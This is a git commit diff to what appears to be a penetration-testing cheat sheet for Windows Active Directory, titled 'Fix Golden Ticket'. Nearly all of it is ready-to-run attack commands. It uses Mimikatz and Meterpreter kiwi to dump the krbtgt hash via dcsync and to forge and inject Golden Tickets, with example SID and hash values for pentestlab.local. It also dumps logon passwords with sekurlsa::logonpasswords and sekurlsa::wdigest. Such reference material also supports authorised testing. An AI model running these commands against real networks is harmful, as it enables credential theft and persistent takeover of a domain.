Fix Golden Ticket
parent
b8fbca3347
commit
f62d466340
@ -45,25 +45,30 @@
|
|||||||
Metasploit : windows/gather/credentials/domain_hashdump
|
Metasploit : windows/gather/credentials/domain_hashdump
|
||||||
```
|
```
|
||||||
* Golden Tickets
|
* Golden Tickets
|
||||||
|
Mimikatz version
|
||||||
```c
|
```c
|
||||||
Get info - Mimikatz
|
Get info - Mimikatz
|
||||||
lsadump::dcsync /user:krbtgt
|
lsadump::dcsync /user:krbtgt
|
||||||
lsadump::lsa /inject /name:krbtgt
|
lsadump::lsa /inject /name:krbtgt
|
||||||
|
|
||||||
Get info - Meterpreter(kiwi)
|
|
||||||
dcsync_ntlm krbtgt
|
|
||||||
|
|
||||||
Forge a Golden ticket - Mimikatz
|
Forge a Golden ticket - Mimikatz
|
||||||
kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
|
kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
|
||||||
kerberos::tgt
|
kerberos::tgt
|
||||||
|
```
|
||||||
|
|
||||||
Forge a Golden ticket - Metasploit
|
Meterpreter version
|
||||||
post/windows/escalate/golden_ticket
|
```c
|
||||||
|
Get info - Meterpreter(kiwi)
|
||||||
|
dcsync_ntlm krbtgt
|
||||||
|
dcsync krbtgt
|
||||||
|
|
||||||
Forge a Golden ticket - Meterpreter
|
Forge a Golden ticket - Meterpreter
|
||||||
load kiwi
|
load kiwi
|
||||||
|
golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
|
||||||
golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
|
golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
|
||||||
|
kerberos_ticket_purge
|
||||||
kerberos_ticket_use /root/Downloads/pentestlabuser.tck
|
kerberos_ticket_use /root/Downloads/pentestlabuser.tck
|
||||||
|
kerberos_ticket_list
|
||||||
```
|
```
|
||||||
* Kerberoast
|
* Kerberoast
|
||||||
```c
|
```c
|
||||||
@ -87,6 +92,7 @@
|
|||||||
```
|
```
|
||||||
load mimikatz
|
load mimikatz
|
||||||
mimikatz_command -f sekurlsa::logonPasswords full
|
mimikatz_command -f sekurlsa::logonPasswords full
|
||||||
|
mimikatz_command -f sekurlsa::wdigest
|
||||||
```
|
```
|
||||||
|
|
||||||
## PowerSploit
|
## PowerSploit
|
||||||
|
@ -13,6 +13,7 @@ Mimikatz console (multiple commands)
|
|||||||
PS C:\temp\mimikatz> .\mimikatz
|
PS C:\temp\mimikatz> .\mimikatz
|
||||||
mimikatz # privilege::debug
|
mimikatz # privilege::debug
|
||||||
mimikatz # sekurlsa::logonpasswords
|
mimikatz # sekurlsa::logonpasswords
|
||||||
|
mimikatz # sekurlsa::wdigest
|
||||||
```
|
```
|
||||||
|
|
||||||
Mimikatz Golden ticket
|
Mimikatz Golden ticket
|
||||||
|